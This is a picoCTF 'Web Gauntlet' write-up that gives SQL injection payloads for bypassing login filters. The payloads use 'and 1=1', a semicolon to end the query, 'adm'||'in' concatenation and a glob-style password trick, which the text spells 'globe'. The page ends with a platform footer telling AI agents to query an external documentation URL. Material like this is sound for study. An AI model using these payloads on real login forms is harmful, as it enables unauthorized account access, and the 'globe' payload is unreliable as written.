# Web Gauntlet

> **Web Gauntlet is a series of challenges on pico ctf that focuses on bypassing SQL Injection filters but not in an advanced way** 

### Level 1

First we see a login form and we are required to login as an admin : 

![](/files/UM4L1cbF5fEEIKgH5ASZ)

If we looked at the filter , we see that these characters are filtered : 

```
Round1: or
```

Nice, so we have a very simple authentication bypass that can be bypassed in many ways , The very basic thing that we can use `and` instead of `or` as follow : 

```
admin' and 1=1-- -;
```

![EZ !!](/files/EH4er6YIVcNNBV7nB9K9)

### Level 2

The same login form again but the filter now has more charatcers which are : 

```
Round2: or and like = --
```

Before we solve it let's imagine the executed query first : 

```
SELECT * FROM user WHERE username = 'admin' AND password = ''
```

So if our username was : `admin';` this would close the query and terminates it right ? to be at the end : 

```
SELECT * FROM users WHERE username = 'admin'; bla bla
```

 

![](/files/xKF3DpHZTKi9Oeh0qeOm)

### Level 3

Updated Filter : 

```
Round3: or and = like > < --
```

Since it didn't filter for `'` nor `;` it wi be the same solution as the previous one .

### Level 4

Updated Filter :&#x20;

```
Round4: or and = like > < -- admin
```

So it now filters for the word admin and we need to login as admin , This can be done by using string concatenation so if it fiters for admin we can combine `adm` and `in` together which are not filtered to get the word admin :&#x20;

```
adm'||'in';
```

![](/files/wn0B0mzCJx5RyXItFy0K)

### Level 5

Updated Filter :&#x20;

```
Round5: or and = like > < -- union admin
```

The same filter but it only included `union` which we didn't use any way so it will be the same solution .

### Level 6

Updated Filter :&#x20;

```
Filters: or and true false union like = > < ; -- /* */ admin
```

It now filters for the `;` character which was important to terminate our query. Now we will include the password field to gain access as admin .

For the username part we can use :  `adm'||'in` so it will be concatenated as admin .

For the password part we can think for mutiple solutions but i prefered to use the `globe` keyword as follow : `' globe'*`&#x20;

{% hint style="info" %}
`This evaluates our query to : SELECT * FROM users where username = 'adm'||'in' AND password = ''globe '*'`&#x20;

`And this basically means to get us a user with username of admin with any password .`
{% endhint %}

&#x20;


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://khalid-emad.gitbook.io/sqli-filter-bypass-101/web-gauntlet.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.